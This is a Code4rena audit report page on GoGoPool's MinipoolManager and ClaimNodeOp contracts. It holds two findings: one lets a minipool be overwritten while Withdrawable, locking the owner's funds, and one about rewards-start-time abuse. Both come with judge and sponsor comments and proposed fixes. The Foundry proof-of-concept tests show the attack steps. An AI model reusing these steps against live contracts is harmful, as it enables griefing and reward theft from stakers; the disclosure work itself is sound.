Platform: Code4rena
Start Date: 15/12/2022
Pot Size: $128,000 USDC
Total HM: 28
Participants: 111
Period: 19 days
Judge: GalloDaSballo
Total Solo HM: 1
Id: 194
League: ETH
Rank: 56/111
Findings: 2
Award: $128.81
π Selected for report: 0
π Solo Findings: 0
π Selected for report: 0xdeadbeef0x
Also found by: 0Kage, 0xc0ffEE, 0xmint, AkshaySrivastav, Allarious, Ch_301, Franfran, HollaDieWaldfee, IllIllI, Jeiwan, Lirios, Manboy, adriro, ak1, bin2chen, caventa, chaduke, clems4ever, cozzetti, datapunk, imare, immeas, kaliberpoziomka8552, ladboy233, pauliax, peritoflores, rvierdiiev, sces60107, sk8erboy, stealthyz, unforgiven, wagmi, wallstreetvilkas, yixxas
9.9345 USDC - $9.93
https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L242-L246 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L163-L164 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L289
Currently it is possible to create a minipool with an existing node ID that will reset the existing minipool's attributes and make it impossible for the previous node operator to withdraw his/her staked assets and rewards. The minimum amount of AVAX to deposit into a minipool as a node operator is 1000 AVAX which is about 11,600 $USD at the time of writing this. If there are multiple minipools this $ amount could get very high.
Since this vulnerability locks up the node operators staked assets with the validation rewards and is easy to execute I will report this as a High. This kind of attack won't be beneficial to the attacker and thus is called a griefing attack.
To validate that a new minipool can be created with an existing node ID the state of that existing minipool has to be either Finished
or Cancelled
as stated in the natspec below, unfortunately these are not the only states that currently allow this. The state is checked in MinipoolManager.createMinipool()
:
...SNIPPET... // Create or update a minipool record for nodeID // If nodeID exists, only allow overwriting if node is finished or canceled // (completed its validation period and all rewards paid and processing is complete) int256 minipoolIndex = getIndexOf(nodeID); if (minipoolIndex != -1) { requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch); resetMinipoolData(minipoolIndex); // Also reset initialStartTime as we are starting a whole new validation setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0); } else { minipoolIndex = int256(getUint(keccak256("minipool.count"))); // The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf() setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1)); setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID); addUint(keccak256("minipool.count"), 1); } ...SNIPPET...
If minipoolIndex != 1
the node ID is an existing one and the state of it is checked via requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch)
:
/// @notice Ensure a minipool is allowed to move to the "to" state /// @param minipoolIndex A valid minipool index /// @param to New status function requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to) private view { bytes32 statusKey = keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")); MinipoolStatus currentStatus = MinipoolStatus(getUint(statusKey)); bool isValid; if (currentStatus == MinipoolStatus.Prelaunch) { isValid = (to == MinipoolStatus.Launched || to == MinipoolStatus.Canceled); } else if (currentStatus == MinipoolStatus.Launched) { isValid = (to == MinipoolStatus.Staking || to == MinipoolStatus.Error); } else if (currentStatus == MinipoolStatus.Staking) { isValid = (to == MinipoolStatus.Withdrawable || to == MinipoolStatus.Error); } else if (currentStatus == MinipoolStatus.Withdrawable || currentStatus == MinipoolStatus.Error) { isValid = (to == MinipoolStatus.Finished || to == MinipoolStatus.Prelaunch); } else if (currentStatus == MinipoolStatus.Finished || currentStatus == MinipoolStatus.Canceled) { // Once a node is finished/canceled, if they re-validate they go back to beginning state isValid = (to == MinipoolStatus.Prelaunch); } else { isValid = false; } if (!isValid) { revert InvalidStateTransition(); } }
We can see that this will return true
in this case when the current minipool status is Withdrawable || Error || Finished || Canceled
. The Withdrawable
state is where this attack would occur.
Normally when a minipool is in the Withdrawable
state the node operator can call a withdraw function in MinipoolManager.sol
to pull out their staked assets and rewards. It is during this state that another user can create a new minipool that will reset the minipool attributes and thus the node operator wouldn't pass the onlyOwner(minipoolIndex)
check and would revert:
/// @notice Withdraw function for a Node Operator to claim all AVAX funds they are due (original AVAX staked, plus any AVAX rewards) /// @param nodeID 20-byte Avalanche node ID the Node Operator registered with function withdrawMinipoolFunds(address nodeID) external nonReentrant { int256 minipoolIndex = requireValidMinipool(nodeID); address owner = onlyOwner(minipoolIndex); requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished)); uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt"))); uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt"))); uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt; Staking staking = Staking(getContractAddress("Staking")); staking.decreaseAVAXStake(owner, avaxNodeOpAmt); Vault vault = Vault(getContractAddress("Vault")); vault.withdrawAVAX(totalAvaxAmt); owner.safeTransferETH(totalAvaxAmt); }
Here is a test script to showcase this vulnerability, please modify the corresponding function in MinipoolManager.t.sol
test file. The added code is marked with the 'NEW' keyword:
function testWithdrawMinipoolFunds() public { address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT); vm.prank(liqStaker1); ggAVAX.depositAVAX{value: MAX_AMT}(); uint256 duration = 2 weeks; uint256 depositAmt = 1000 ether; uint256 avaxAssignmentRequest = 1000 ether; uint256 validationAmt = depositAmt + avaxAssignmentRequest; uint128 ggpStakeAmt = 200 ether; vm.startPrank(nodeOp); ggp.approve(address(staking), MAX_AMT); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration); vm.stopPrank(); vm.startPrank(address(rialto)); minipoolMgr.claimAndInitiateStaking(mp1.nodeID); bytes32 txID = keccak256("txid"); minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp); skip(duration); uint256 rewards = 10 ether; uint256 halfRewards = rewards / 2; deal(address(rialto), address(rialto).balance + rewards); minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(mp1.nodeID, block.timestamp, rewards); uint256 percentage = dao.getMinipoolNodeCommissionFeePct(); uint256 commissionFee = (percentage).mulWadDown(halfRewards); vm.stopPrank(); // NEW address nodeOp2 = getActorWithTokens("nodeOp", MAX_AMT, MAX_AMT); vm.startPrank(nodeOp2); ggp.approve(address(staking), MAX_AMT); staking.stakeGGP(ggpStakeAmt); minipoolMgr.createMinipool{value: depositAmt}(mp1.nodeID, 2 weeks, 0.02 ether, 1000 ether); vm.stopPrank(); // NEW vm.startPrank(nodeOp); uint256 priorBalanceNodeOp = nodeOp.balance; vm.expectRevert(); minipoolMgr.withdrawMinipoolFunds(mp1.nodeID); assertEq((nodeOp.balance), priorBalanceNodeOp); }
The node operator nodeOp2
can grief the nodeOp
user by creating a new minipool with the existing node ID that is in the Withdrawable
state. This test fails with an error of [FAIL. Reason: OnlyOwner()]
when the nodeOp
tries to withdraw.
I recommend that the state transition to Prelaunch
should be validated correctly and not allowing the state change to happen if the existing minipool is in the Withdrawable
or Error
state. It is stated correclty in the snippet from before that the transition should be only possible if the state is Failed
or Cancelled
so I'm not sure if this was a pure accident to allow this transition or something else.
Editing the requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to)
function to look something like the one below would fix the issue.
function requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to) private view { bytes32 statusKey = keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")); MinipoolStatus currentStatus = MinipoolStatus(getUint(statusKey)); bool isValid; if (currentStatus == MinipoolStatus.Prelaunch) { isValid = (to == MinipoolStatus.Launched || to == MinipoolStatus.Canceled); } else if (currentStatus == MinipoolStatus.Launched) { isValid = (to == MinipoolStatus.Staking || to == MinipoolStatus.Error); } else if (currentStatus == MinipoolStatus.Staking) { isValid = (to == MinipoolStatus.Withdrawable || to == MinipoolStatus.Error); } else if (currentStatus == MinipoolStatus.Withdrawable || currentStatus == MinipoolStatus.Error) { - isValid = (to == MinipoolStatus.Finished || to == MinipoolStatus.Prelaunch); + isValid = (to == MinipoolStatus.Finished); } else if (currentStatus == MinipoolStatus.Finished || currentStatus == MinipoolStatus.Canceled) { // Once a node is finished/canceled, if they re-validate they go back to beginning state isValid = (to == MinipoolStatus.Prelaunch); } else { isValid = false; } if (!isValid) { revert InvalidStateTransition(); } }
Manual review in VS Code
#0 - 0xminty
2023-01-04T00:08:13Z
dupe of #805
#1 - c4-judge
2023-01-09T12:37:36Z
GalloDaSballo marked the issue as duplicate of #213
#2 - c4-judge
2023-02-03T12:33:01Z
GalloDaSballo changed the severity to 2 (Med Risk)
#3 - c4-judge
2023-02-03T19:26:10Z
GalloDaSballo changed the severity to 3 (High Risk)
#4 - c4-judge
2023-02-08T08:26:46Z
GalloDaSballo changed the severity to 2 (Med Risk)
#5 - c4-judge
2023-02-08T08:50:11Z
GalloDaSballo changed the severity to 3 (High Risk)
#6 - c4-judge
2023-02-08T20:29:15Z
GalloDaSballo marked the issue as satisfactory
#7 - c4-judge
2023-02-09T08:53:06Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#8 - Simon-Busch
2023-02-09T12:52:54Z
Changed severity back from QA to H as requested by @GalloDaSballo
π Selected for report: caventa
Also found by: 0xdeadbeef0x, Allarious, Franfran, __141345__, betweenETHlines, hansfriese, mert_eren, stealthyz, unforgiven, wagmi
118.8832 USDC - $118.88
https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L225-L227 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/ClaimNodeOp.sol#L44-L52
This is a two-part submission because the main bug is the same in both of these cases. Feel free to split these up if needed.
There is a storage variable called staker.item<stakerIndex>.rewardsStartTime
which holds a timestamp of when a minipool was created and is used for checking if a node operator is eligible for rewards at the end of a reward cycle. This function checks the eligibilty:
/// @notice Determines if a staker is eligible for the upcoming rewards cycle /// @dev Eligiblity: time in protocol (secs) > RewardsEligibilityMinSeconds. Rialto will call this. function isEligible(address stakerAddr) external view returns (bool) { Staking staking = Staking(getContractAddress("Staking")); uint256 rewardsStartTime = staking.getRewardsStartTime(stakerAddr); uint256 elapsedSecs = (block.timestamp - rewardsStartTime); ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO")); return (rewardsStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds()); }
To be eligible the elapsed time between creating a minipool and calling this function should be more than dao.getRewardsEligibilityMinSeconds()
which is currently 14 days
.
The core issue is that the staker.item<stakerIndex>.rewardsStartTime
is tied to a user instead of a minipool. This means that the protocol treats a node operator's minipools equally when it comes to rewardsStartTime
(every minipool has the same value for that variable). Because it is possible to create multiple minipools the .rewardsStartTime
is always for the oldest minipool created and the newly created ones are enjoying the benefits. When new minipools are created the .rewardsStartTime
is only changed if it is zero but otherwise not changed, MinipoolManager.createMinipool()
:
/// @notice Accept AVAX deposit from node operator to create a Minipool. Node Operator must be staking GGP. Open to public. /// @param nodeID 20-byte Avalanche node ID /// @param duration Requested validation period in seconds /// @param delegationFee Percentage delegation fee in units of ether (2% is 0.2 ether) /// @param avaxAssignmentRequest Amount of requested AVAX to be matched for this Minipool function createMinipool( address nodeID, uint256 duration, uint256 delegationFee, uint256 avaxAssignmentRequest ) external payable whenNotPaused { if (nodeID == address(0)) { revert InvalidNodeID(); } ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO")); if ( // Current rule is matched funds must be 1:1 nodeOp:LiqStaker msg.value != avaxAssignmentRequest || avaxAssignmentRequest > dao.getMinipoolMaxAVAXAssignment() || avaxAssignmentRequest < dao.getMinipoolMinAVAXAssignment() ) { revert InvalidAVAXAssignmentRequest(); } if (msg.value + avaxAssignmentRequest < dao.getMinipoolMinAVAXStakingAmt()) { revert InsufficientAVAXForMinipoolCreation(); } Staking staking = Staking(getContractAddress("Staking")); staking.increaseMinipoolCount(msg.sender); staking.increaseAVAXStake(msg.sender, msg.value); staking.increaseAVAXAssigned(msg.sender, avaxAssignmentRequest); if (staking.getRewardsStartTime(msg.sender) == 0) { staking.setRewardsStartTime(msg.sender, block.timestamp); } uint256 ratio = staking.getCollateralizationRatio(msg.sender); if (ratio < dao.getMinCollateralizationRatio()) { revert InsufficientGGPCollateralization(); } // Get a Rialto multisig to assign for this minipool MultisigManager multisigManager = MultisigManager(getContractAddress("MultisigManager")); address multisig = multisigManager.requireNextActiveMultisig(); // Create or update a minipool record for nodeID // If nodeID exists, only allow overwriting if node is finished or canceled // (completed its validation period and all rewards paid and processing is complete) int256 minipoolIndex = getIndexOf(nodeID); if (minipoolIndex != -1) { requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch); resetMinipoolData(minipoolIndex); // Also reset initialStartTime as we are starting a whole new validation setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0); } else { minipoolIndex = int256(getUint(keccak256("minipool.count"))); // The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf() setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1)); setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID); addUint(keccak256("minipool.count"), 1); } // Save the attrs individually in the k/v store setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch)); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".duration")), duration); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".delegationFee")), delegationFee); setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")), msg.sender); setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".multisigAddr")), multisig); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpInitialAmt")), msg.value); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), msg.value); setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), avaxAssignmentRequest); emit MinipoolStatusChanged(nodeID, MinipoolStatus.Prelaunch); Vault vault = Vault(getContractAddress("Vault")); vault.depositAVAX{value: msg.value}(); }
Reward start time is only updated if it is at zero:
...SNIPPET... if (staking.getRewardsStartTime(msg.sender) == 0) { staking.setRewardsStartTime(msg.sender, block.timestamp); } ...SNIPPET...
The only place where RewardsStartTime
is set to zero is in ClaimNodeOp.calculateAndDistributeRewards()
but only if the minipool count is zero:
/// @notice Set the share of rewards for a staker as a fraction of 1 ether /// @dev Rialto will call this function calculateAndDistributeRewards(address stakerAddr, uint256 totalEligibleGGPStaked) external onlyMultisig { Staking staking = Staking(getContractAddress("Staking")); staking.requireValidStaker(stakerAddr); RewardsPool rewardsPool = RewardsPool(getContractAddress("RewardsPool")); if (rewardsPool.getRewardsCycleCount() == 0) { revert RewardsCycleNotStarted(); } if (staking.getLastRewardsCycleCompleted(stakerAddr) == rewardsPool.getRewardsCycleCount()) { revert RewardsAlreadyDistributedToStaker(stakerAddr); } staking.setLastRewardsCycleCompleted(stakerAddr, rewardsPool.getRewardsCycleCount()); uint256 ggpEffectiveStaked = staking.getEffectiveGGPStaked(stakerAddr); uint256 percentage = ggpEffectiveStaked.divWadDown(totalEligibleGGPStaked); uint256 rewardsCycleTotal = getRewardsCycleTotal(); uint256 rewardsAmt = percentage.mulWadDown(rewardsCycleTotal); if (rewardsAmt > rewardsCycleTotal) { revert InvalidAmount(); } staking.resetAVAXAssignedHighWater(stakerAddr); staking.increaseGGPRewards(stakerAddr, rewardsAmt); // check if their rewards time should be reset uint256 minipoolCount = staking.getMinipoolCount(stakerAddr); if (minipoolCount == 0) { staking.setRewardsStartTime(stakerAddr, 0); } }
if (minipoolcount == 0) { staking.setRewardsStartTime(stakerAddr, 0); }
This means that if a node operator has multiple minipools, the ladder ones created have the RewardsStartTime
of the oldest one.
I'm on the fence of reporting this as a Medium instead of a High but since the Issue-01 below is directly affecting the other stakers funds by unfairly reducing them I will report this as High since the staker rewards are 'lost'. I hope this is correct but understand if the severity is lowered to Medium.
After creating a normal minipool a node operator can create another minipool which will have the same RewardsStartTime
than their first minipool thus making the new minipool eligible for rewards before the minimum staking period RewardsEligibilityMinSeconds
which is currently 14 days. This attack will decrease the amount of rewards distributed to other 'legit' stakers in the current reward cycle due to the fact that there are more stakers involved. Naturally it will increase the amount of rewards the attacker gets from the ongoing rewards cycle at the expence of other stakers.
The Rialto oracle will check if a user is eligible for rewards via ClaimNodeOp.isEligible()
and then call ClaimNodeOp.calculateAndDistributeRewards()
which will increase the node operators GGP rewards. As explained above the ClaimNodeOp.isEligible()
will always return true for every minipool if a node operator has one minipool which is eligible because the RewardsStartTime
stays the same.
Here is a test script that showcases the early rewards bug, please edit the corresponding test function to look like this in Scenarios.t.sol
function testHalfRewardsForUnvestedGGPLargerScale() public { uint256 duration = 2 weeks; uint256 depositAmt = dao.getMinipoolMinAVAXAssignment(); uint256 ggpStakeAmt = depositAmt.mulWadDown(dao.getMinCollateralizationRatio()); vm.startPrank(nodeOp1); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp1 = createAndStartMinipool(depositAmt, depositAmt, 10000 days); vm.stopPrank(); vm.startPrank(nodeOp2); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp2 = createAndStartMinipool(depositAmt, depositAmt, duration); vm.stopPrank(); vm.startPrank(nodeOp3); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp5 = createAndStartMinipool(depositAmt, depositAmt, duration); vm.stopPrank(); vm.startPrank(nodeOp4); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp6 = createAndStartMinipool(depositAmt, depositAmt, duration); vm.stopPrank(); vm.startPrank(investor1); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp3 = createAndStartMinipool(depositAmt, depositAmt, duration); vm.stopPrank(); vm.startPrank(investor2); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp4 = createAndStartMinipool(depositAmt, depositAmt, duration); vm.stopPrank(); // 1 second before the 14 day period is over skip(duration - 1 seconds); // Create a minipool to get rewards vm.startPrank(nodeOp1); ggp.approve(address(staking), ggpStakeAmt); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory cheaterMp = createAndStartMinipool(depositAmt, depositAmt, duration ); vm.stopPrank(); // Skip to 14 days after minipools were created skip(1 seconds); // End the minipool that was created 1 second ago cheaterMp = rialto.processMinipoolEndWithRewards(cheaterMp.nodeID); mp1 = rialto.processMinipoolEndWithRewards(mp1.nodeID); mp2 = rialto.processMinipoolEndWithRewards(mp2.nodeID); mp3 = rialto.processMinipoolEndWithRewards(mp3.nodeID); mp4 = rialto.processMinipoolEndWithRewards(mp4.nodeID); mp5 = rialto.processMinipoolEndWithRewards(mp5.nodeID); mp6 = rialto.processMinipoolEndWithRewards(mp6.nodeID); skip(block.timestamp - rewardsPool.getRewardsCycleStartTime()); assertTrue(rewardsPool.canStartRewardsCycle()); //investors and regular nodes have the same eligibility requirements assertTrue(nopClaim.isEligible(nodeOp1), "isEligible"); assertTrue(nopClaim.isEligible(nodeOp2), "isEligible"); assertTrue(nopClaim.isEligible(nodeOp3), "isEligible"); assertTrue(nopClaim.isEligible(nodeOp4), "isEligible"); assertTrue(nopClaim.isEligible(investor1), "isEligible"); assertTrue(nopClaim.isEligible(investor2), "isEligible"); rialto.processGGPRewards(); // Notice the unequality in rewards, nodeOp1 has gotten the distributed rewards for both mp1 and cheaterMp, is this intentional because it seems off console.log("nodeOp1: ", staking.getGGPRewards(nodeOp1)); assertGt(staking.getGGPRewards(nodeOp1), 2 * staking.getGGPRewards(nodeOp2)); console.log("nodeOp2: ", staking.getGGPRewards(nodeOp2)); console.log("nodeOp3: ", staking.getGGPRewards(nodeOp3)); console.log("nodeOp4: ", staking.getGGPRewards(nodeOp4)); console.log("investor1: ", staking.getGGPRewards(investor1)); console.log("investor2: ", staking.getGGPRewards(investor2)); }
As proven the nodeOp1
will receive rewards from both mp1 and cheaterMp
which is why the rewards for the other node operators will be decreased.
A minipool can be cancelled if the time elapsed since creation is less than dao.getMinipoolCancelMoratoriumSeconds() == 5 days
. After 5 days of creating their first minipool a node operator can create new minipools and cancel them immediately without the 5 day waiting period.
/// @notice Owner of a minipool can cancel the (prelaunch) minipool /// @param nodeID 20-byte Avalanche node ID the Owner registered with function cancelMinipool(address nodeID) external nonReentrant { Staking staking = Staking(getContractAddress("Staking")); ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO")); int256 index = requireValidMinipool(nodeID); onlyOwner(index); // make sure they meet the wait period requirement if (block.timestamp - staking.getRewardsStartTime(msg.sender) < dao.getMinipoolCancelMoratoriumSeconds()) { revert CancellationTooEarly(); } _cancelMinipoolAndReturnFunds(nodeID, index); }
In the function above, staking.getRewardsStartTime(msg.sender)
gets the .rewardsStartTime
of the oldest minipool created by the calling node operator.
Please add the parts shown by "NEW" comments to the corresponding test function in MinipoolManager.t.sol
:
function testCancelMinipool() public { uint256 duration = 2 weeks; uint256 depositAmt = 1000 ether; uint256 avaxAssignmentRequest = 1000 ether; uint128 ggpStakeAmt = 200 ether; // Warping to have the rewardsTime != 1 vm.warp(block.timestamp+33 days); vm.startPrank(nodeOp); ggp.approve(address(staking), MAX_AMT); staking.stakeGGP(ggpStakeAmt); MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration); // NEW uint256 mp1RewardsStartTime = staking.getRewardsStartTime(address(nodeOp)); // NEW vm.stopPrank(); //will fail vm.expectRevert(MinipoolManager.MinipoolNotFound.selector); minipoolMgr.cancelMinipool(address(0)); //will fail vm.expectRevert(MinipoolManager.OnlyOwner.selector); minipoolMgr.cancelMinipool(mp1.nodeID); //will fail int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID); store.setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Error)); vm.prank(nodeOp); //will fail vm.expectRevert(MinipoolManager.CancellationTooEarly.selector); minipoolMgr.cancelMinipool(mp1.nodeID); skip(5 days); //cancellation moratorium vm.prank(nodeOp); vm.expectRevert(MinipoolManager.InvalidStateTransition.selector); minipoolMgr.cancelMinipool(mp1.nodeID); store.setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch)); vm.startPrank(nodeOp); uint256 priorBalance = nodeOp.balance; minipoolMgr.cancelMinipool(mp1.nodeID); MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex); assertEq(mp1Updated.status, uint256(MinipoolStatus.Canceled)); assertEq(staking.getMinipoolCount(mp1Updated.owner), 0); assertEq(staking.getAVAXStake(mp1Updated.owner), 0); assertEq(staking.getAVAXAssigned(mp1Updated.owner), 0); assertEq(nodeOp.balance - priorBalance, mp1Updated.avaxNodeOpAmt); // NEW MinipoolManager.Minipool memory mp2 = createMinipool(depositAmt, avaxAssignmentRequest, duration); uint256 mp2RewardsStartTime = staking.getRewardsStartTime(address(nodeOp)); assertEq(mp1RewardsStartTime, mp2RewardsStartTime); // Passing the cancellation time check minipoolMgr.cancelMinipool(mp2.nodeID); // NEW }
A node operator is able to create a minipool and cancel it immediately as long as this isn't their first minipool and 5 days has passed from the creation of their oldest minipool. After the 5 day wait a user can keep cancelling new minipools immediately.
Manual review in Visual Studio Code as well as foundry for testing.
I hope that I have explained the bug well enough to understand that this problem is quite deep in the code base. It is assumed that a rewards start time is same accross all the minipools when it should be minipool specific (at least to prevent this bug).
Since the main problem that links the two bugs together is the RewardsStartTime
variable there should be some changes to the way that it is assigned. Currently it is assigned for a user address but what if it were assigned to a minipool nodeID instead. This way the rewards eligibility should be checked against a minipool.
Here is the original ClaimNodeOp.isEligible()
:
function isEligible(address stakerAddr) external view returns (bool) { Staking staking = Staking(getContractAddress("Staking")); uint256 rewardsStartTime = staking.getRewardsStartTime(stakerAddr); uint256 elapsedSecs = (block.timestamp - rewardsStartTime); ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO")); return (rewardsStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds()); }
It could be changed to something like this:
function isEligible(address nodeID) external view returns (bool) { Staking staking = Staking(getContractAddress("Staking")); MinipoolManager minipoolManager = MinipoolManager(getContractAddress("MinipoolManager")); int256 minipoolIndex = minipoolManager.getIndexOf(nodeID); if (minipoolIndex == -1) { revert MinipoolManager.MinipoolNotFound(); } MinipoolManager.Minipool memory mp = minipoolManager.getMinipool(minipoolIndex); uint256 rewardStartTime = mp.startTime; uint256 elapsedSecs = (block.timestamp - rewardStartTime); ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO")); return ( rewardStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds()); }
Now the rewards eligibility would be tied to minipools instead of their owners. The downside of this is that the Rialto would need to enumerate through all the active minipools in the protocol which is (likely) a higher number than the total number of node operators.
#0 - GalloDaSballo
2023-01-10T20:30:07Z
The warden sent 2 main findings as one, I'll either bulk under this one, or exceptionally may break this into two.
I recommend always sending different issues separately as you're losing awards as well as making it needlessly more complicated for the Sponsor and the Judge to understand the issues
#1 - 0xju1ie
2023-01-13T21:42:45Z
The first issue they bring up is not a bug - it is by design and known.
The second bug is likely valid - it should look at the minipools time in system rather than the stakers reward start time. Not sure on the severity of that though
#2 - emersoncloud
2023-01-13T21:47:47Z
I agree with @0xju1ie, first point is not an issue. We want to reward Node Operators for minipools as long as they have been in the protocol in some sense for 14 days or longer.
Part 2 - I think the severity of being able to cancel a minipool immediately is medium not high. There isn't a loss of funds associated with cancelling minipools quickly.
#3 - 0xju1ie
2023-01-16T21:34:15Z
should split up since first one is invalid and second one is medium and dupe of https://github.com/code-423n4/2022-12-gogopool-findings/issues/519
#4 - c4-judge
2023-01-29T19:29:54Z
GalloDaSballo marked the issue as duplicate of #519
#5 - GalloDaSballo
2023-01-29T19:29:59Z
Taking issue 2 and duping under 519
#6 - c4-judge
2023-02-08T10:03:43Z
GalloDaSballo changed the severity to 2 (Med Risk)
#7 - c4-judge
2023-02-08T10:04:28Z
GalloDaSballo marked the issue as satisfactory